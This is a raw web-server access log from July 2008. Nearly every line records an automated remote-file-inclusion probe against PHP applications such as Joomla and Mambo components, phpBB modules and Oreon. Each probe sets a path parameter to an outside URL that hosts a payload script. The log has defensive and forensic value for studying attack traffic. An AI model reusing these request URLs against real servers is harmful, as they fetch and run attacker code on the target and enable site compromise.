64.38.22.250 - - [06/Jul/2008:10:32:33 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:37 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:10:32:42 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:33:03 -0700] "GET /logs/access_080121.log//includes?vwar_root=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:33:14 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:33:14 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.12.106 - - [06/Jul/2008:10:33:22 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-Test/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "www.dmulk.com"
72.30.12.106 - - [06/Jul/2008:10:33:22 -0700] "GET /funny?N=A HTTP/1.0" 301 78 "-" "Mozilla/5.0 (Yahoo-Test/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "www.dmulk.com"
72.30.12.106 - - [06/Jul/2008:10:33:22 -0700] "GET /funny/?N=A HTTP/1.0" 200 792 "http://www.dmulk.com/funny?N=A#YSc2MAowCg--" "Mozilla/5.0 (Yahoo-Test/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:33:38 -0700] "GET /logs/access_071223.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.neilhosker.net//myrid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:33:43 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:10:33:48 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:33:49 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:33:50 -0700] "GET /logs/index.php?opcao=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:33:53 -0700] "GET /index.php?opcao=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 200 18401 "-" "libwww-perl/5.810" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:33:54 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:33:56 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:33:59 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:34:04 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.178.128.116 - - [06/Jul/2008:10:34:10 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages&cpage=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:34:25 -0700] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:34:26 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:34:29 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:34:40 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:34:40 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:34:41 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:34:42 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:34:43 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:34:43 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:34:43 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.116.7.83 - - [06/Jul/2008:10:34:44 -0700] "GET /logs/access_080315.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:34:45 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:35:20 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:35:20 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:35:21 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:35:21 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:35:24 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18587 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:35:25 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:35:25 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:35:26 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.255.31.82 - - [06/Jul/2008:10:35:34 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:35:45 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:35:47 -0700] "GET /logs/access_080201.log/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:35:56 -0700] "GET /?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:10:35:58 -0700] "GET /logs/?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 200 54992 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:36:08 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:36:08 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:36:09 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:10:36:12 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:36:13 -0700] "GET /logs/access_080313.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.229 - - [06/Jul/2008:10:36:14 -0700] "GET //includes?vwar_root=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:10:36:18 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:10:36:38 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:10:36:38 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:36:42 -0700] "GET /logs/home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:36:47 -0700] "GET /home.php?inc=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:36:56 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:36:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [06/Jul/2008:10:36:57 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.neilhosker.net//myrid.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.57 - - [06/Jul/2008:10:37:02 -0700] "GET /logs/access_080207.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:37:06 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:37:06 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:37:06 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.17.101.237 - - [06/Jul/2008:10:37:15 -0700] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:10:37:21 -0700] "GET /logs//index.php4?lang=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.17 - - [06/Jul/2008:10:37:21 -0700] "GET //index.php4?lang=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:37:29 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:10:37:53 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:37:58 -0700] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:37:59 -0700] "GET /logs/access_071230.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:37:59 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:02 -0700] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:02 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:13 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:16 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:38:24 -0700] "GET /logs/access_080215.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:10:38:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:10:38:35 -0700] "GET /logs/access_080215.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:10:38:45 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:10:38:45 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:10:38:45 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:38:54 -0700] "GET /logs/access_080319.log//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:38:55 -0700] "GET //includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.160.134.131 - - [06/Jul/2008:10:38:56 -0700] "GET /logs//includes?vwar_root=http://www.lust24.ch/forum/acp/.../sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [06/Jul/2008:10:38:59 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.theblackhole.us/forum/chat/inc/cmses/bind/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:39:24 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:10:39:28 -0700] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.79.127.188 - - [06/Jul/2008:10:39:37 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.85.201.66 - - [06/Jul/2008:10:39:38 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://messi30.ovh.org/pollphp/db/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:10:39:44 -0700] "GET /logs/home.php?table=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:39:44 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:39:44 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:10:39:44 -0700] "GET /home.php?table=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:39:45 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.168.33.226 - - [06/Jul/2008:10:39:46 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:39:51 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:39:51 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:39:53 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:39:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:10:40:06 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:40:07 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:40:07 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:40:07 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:40:07 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.neilhosker.net/myrid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
